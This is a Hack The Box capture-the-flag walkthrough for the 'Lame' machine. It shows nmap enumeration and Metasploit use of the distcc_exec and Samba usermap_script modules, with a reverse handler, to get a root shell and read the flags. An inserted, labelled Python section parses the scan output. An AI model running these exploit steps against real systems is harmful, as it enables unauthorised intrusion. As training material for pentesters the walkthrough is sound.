This is, in my opinion, the easiest box on the HTB platform. You find a vulnerability and just exploiting it reveals all the flags.

Enumeration

Let’s start with an nmap scan:

nmap -Pn -A 10.10.10.3
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 20:46 CEST
Nmap scan report for 10.10.10.3
Host is up (0.079s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION

21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.221
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status

22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m26s, deviation: 2h49m45s, median: 24s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2025-05-26T14:47:35-04:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.70 seconds

The FTP service allows anonymous logins, which is very unsafe; however, no files are found. The vsftpd version also seems vulnerable to a backdoor RCE.

The SSH service does not seem particularly vulnerable.

The SMB server seems to be vulnerable. Before we address it, let’s verify we didn’t miss any ports:

nmap -p- -Pn 10.10.10.3
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

There is one uncommon port we missed. Let’s check it out:

nmap -Pn -A -p 3632 10.10.10.3
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 20:59 CEST
Nmap scan report for 10.10.10.3
Host is up (0.079s latency).

PORT     STATE SERVICE VERSION
3632/tcp open  distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

The distccd service is the server daemon for distcc, a distributed C compiler; this version does appear to be vulnerable.
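The comparison between the default scan and the full-port scan, as an added example that is not part of the original write-up: it parses nmap's normal output, lists ports the default scan did not cover, and flags the weak settings visible in the script results. The sample text is constructed from excerpts of the scans above, and the function names are hypothetical.

```python
import re

# Constructed sample input: excerpts of the two scans shown in this write-up.
DEFAULT_SCAN = """\
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
|_  message_signing: disabled (dangerous, but default)
"""
FULL_SCAN = """\
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd
"""

# Matches "PORT/PROTO open SERVICE [VERSION]"; NSE script lines start with "|".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

def open_ports(scan_text):
    """Return {(port, proto): (service, version)} for every open port line."""
    ports = {}
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports[(int(m.group(1)), m.group(2))] = (m.group(3), m.group(4).strip())
    return ports

def missed_ports(default_scan, full_scan):
    """Ports open in the -p- scan that the default scan did not list."""
    seen = open_ports(default_scan)
    return sorted(k for k in open_ports(full_scan) if k not in seen)

def script_findings(scan_text):
    """Flag the weak settings reported by the NSE scripts in the scan output."""
    checks = {
        "anonymous FTP login allowed": r"ftp-anon: Anonymous FTP login allowed",
        "SMB message signing disabled": r"message_signing: disabled",
    }
    return [name for name, pat in checks.items() if re.search(pat, scan_text)]

if __name__ == "__main__":
    for port, proto in missed_ports(DEFAULT_SCAN, FULL_SCAN):
        print(f"not in default scan: {port}/{proto}")
    for finding in script_findings(DEFAULT_SCAN):
        print(f"weak setting: {finding}")
```

Run against saved scan output from hosts you administer, the same diff shows which listening services a default-port scan leaves out of an exposure review.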

Vulnerability

distccd

First, let’s check the uncommon port, as it is usually more likely to be the solution.

There is a known vulnerability for this version of the service, and Metasploit has a module for it:

msfconsole -q
msf6 > search distccd

Matching Modules
================

   #  Name                            Disclosure Date  Rank       Check  Description
   -  ----                            ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution

Let’s select that exploit and run it:

use 0
set rhosts 10.10.10.3
set lhost tun0
check
[+] 10.10.10.3:3632 - The target is vulnerable.

The check reports the target as vulnerable, so let’s run the exploit:

run
[*] Started reverse TCP handler on 10.10.14.221:4444
[*] 10.10.10.3:3632 - stderr: bash: 106: Bad file descriptor
[*] Exploit completed, but no session was created.

We keep getting this even after several attempts. Before digging deeper into it, let’s check out the SMB vulnerability.

SMB

Let’s see if we have better luck with the SMB vulnerability. According to our nmap scan, the target is a Linux machine running Samba version 3.0.20-Debian. The usermap_script module seems promising.

msfconsole -q
search usermap_script
use 0
set rhosts 10.10.10.3
set lhost tun0
exploit
<SNIP>
whoami
root

Post-Exploitation

The exploit lands a shell as root directly, so there is no need for privilege escalation. Let’s cat the flags and own the machine:

cat /root/root.txt
cat /home/makis/user.txt

The end.